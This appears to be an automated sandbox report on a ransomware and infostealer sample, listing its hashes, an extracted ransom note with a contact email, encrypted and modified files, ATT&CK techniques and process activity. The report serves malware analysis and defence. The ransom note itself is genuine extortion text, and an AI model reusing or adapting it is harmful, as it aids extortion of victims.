09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138

General

Target

09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
Size

3.7MB
MD5

d659325ea3491708820a2beffe9362b8
SHA1

6e7f725401c33332beb2383a6802a7e4b2db30a9
SHA256

09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138
SHA512

958f4a72530703131be2f25dc906ab7fc8ee174e9cbd13f9c976af7e986593b56a768e0413e6a85d06f2bdc057ac7d9617f6c25cbf8f13cc2f8348bcf441eeb5

Score

10^/10

ransomware spyware stealer

Malware Config

Extracted

Path

C:\Users\Public\Desktop\Decrypt-Your-Files.txt

Ransom Note

-------------------------------------------- | What happened to your files? -------------------------------------------- We breached your corporate network and encrypted the data on your computers. The encrypted data includes documents, databases, photos and more - all were encrypted using a military grade encryption algorithms (AES-256 and RSA-2048). You cannot access those files right now. But dont worry! You can still get those files back and be up and running again in no time. --------------------------------------------- | How to contact us to get your files back? --------------------------------------------- The only way to restore your files is by purchasing a decryption tool loaded with a private key we created specifically for your network. Once run on an effected computer, the tool will decrypt all encrypted files - and you can resume day-to-day operations, preferably with better cyber security in mind. If you are interested in purchasing the decryption tool contact us at alfredmir@protonmail.com ------------------------------------------------------- | How can you be certain we have the decryption tool? ------------------------------------------------------- In your mail to us attach up to 3 non critical files (up to 3MB, no databases or spreadsheets). We will send them back to you decrypted. ------------------------------------------------------- | What happens if you dont contact us within 48 hours or refuse payment? ------------------------------------------------------- We publish sensitve databases and documents we collected from your network. -------------------------------------------------------

Emails

alfredmir@protonmail.com

Signatures

Modifies extensions of user files 13 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Pictures\StepPush.tiff	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File opened for modification	C:\Users\Admin\Pictures\UnpublishUnregister.tiff	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File renamed	C:\Users\Admin\Pictures\PublishWrite.tif => C:\Users\Admin\Pictures\PublishWrite.tifKQPrs	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File renamed	C:\Users\Admin\Pictures\RepairStep.crw => C:\Users\Admin\Pictures\RepairStep.crwhfHJk	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File renamed	C:\Users\Admin\Pictures\SetSearch.tif => C:\Users\Admin\Pictures\SetSearch.tifgJiNb	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File renamed	C:\Users\Admin\Pictures\UnblockWrite.crw => C:\Users\Admin\Pictures\UnblockWrite.crwBjIko	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File opened for modification	C:\Users\Admin\Pictures\SendRedo.tiff	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File renamed	C:\Users\Admin\Pictures\DismountDebug.raw => C:\Users\Admin\Pictures\DismountDebug.rawWkSlp	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File renamed	C:\Users\Admin\Pictures\HideEdit.tif => C:\Users\Admin\Pictures\HideEdit.tifSBikP	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File renamed	C:\Users\Admin\Pictures\SearchInitialize.crw => C:\Users\Admin\Pictures\SearchInitialize.crwFJKkc	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File renamed	C:\Users\Admin\Pictures\SendRedo.tiff => C:\Users\Admin\Pictures\SendRedo.tifftOkAa	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File renamed	C:\Users\Admin\Pictures\StepPush.tiff => C:\Users\Admin\Pictures\StepPush.tiffMRaLn	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File renamed	C:\Users\Admin\Pictures\UnpublishUnregister.tiff => C:\Users\Admin\Pictures\UnpublishUnregister.tiffqpBax	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Drops file in Program Files directory 64 IoCs

Processes:

09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe

description	ioc	process
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_windy.png	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-6	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-text.xml	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\drag.png	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\square_s.png	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\EN00397_.WMF	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGWEBREF.XML	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\ENV11.POC	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0239951.WMF	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Premium.css	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0282932.WMF	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Swirl\TAB_OFF.GIF	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Asia\Thimphu	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SCHOL_02.MID	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\ACCWIZ\ACWZMAIN.ACCDE	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\PS10TARG.POC	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\ipsfra.xml	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_image-frame-backglow.png	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\en-US\js\slideShow.js	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BL00194_.WMF	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0300520.GIF	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\intf\telnet.luac	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\prev_hov.png	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01035U.BMP	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21320_.GIF	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\Part\1 Right.accdt	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\sunmscapi.jar	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00694_.WMF	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\DocumentShare\WSSFilesToolHomePageBackground.jpg	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-io.jar	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\MSOUC_K_COL.HXK	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\DataSet.zip	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-api_zh_CN.jar	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\images\base-undocked-4.png	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\on_desktop\slideshow_glass_frame.png	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateHelper.msi	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\Charitable Contributions.accdt	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BrightOrange\TAB_ON.GIF	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\LTHD98SP.POC	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\boot_ja.jar	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-sendopts_ja.jar	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Hardcover.xml	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME12.CSS	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Slate\TAB_OFF.GIF	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\bNext-disable.png	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0211981.WMF	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287018.WMF	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\Stationery\Shades of Blue.htm	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Vilnius	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-annotations-common.xml	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-profiling.xml	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\view.html	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0318810.WMF	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\CONVERT\1033\OLMAILR.FAE	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\LISTBOX.JPG	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\44.png	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-actions.jar	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\MST7MDT	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\OneNote.en-us\SETUP.XML	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21398_.GIF	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLV.PPT	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.mbeanbrowser.zh_CN_5.5.0.165303.jar	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Africa\Accra	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe

Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

916 1356 WerFault.exe

pid	pid_target	process	target process
916	1356	WerFault.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exeWerFault.exe

pid	process
288	09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
916	WerFault.exe
916	WerFault.exe
916	WerFault.exe
916	WerFault.exe
916	WerFault.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

vssvc.exeWerFault.exe

description	pid	process
Token: SeBackupPrivilege	1112	vssvc.exe
Token: SeRestorePrivilege	1112	vssvc.exe
Token: SeAuditPrivilege	1112	vssvc.exe
Token: SeDebugPrivilege	916	WerFault.exe

C:\Users\Admin\AppData\Local\Temp\09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe
"C:\Users\Admin\AppData\Local\Temp\09133f97793186542546f439e518554a5bb17117689c83bc3978cc532ae2f138.sample.exe"
1⤵
- Modifies extensions of user files
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:288

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1112

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1356 -s 2980
1⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:916

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials in Files

1

T1081

Discovery

Lateral Movement

Collection

Data from Local System

1

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/916-59-0x000007FEFBEF1000-0x000007FEFBEF3000-memory.dmp

Filesize
8KB

Download
memory/916-60-0x0000000001EB0000-0x0000000001EB1000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads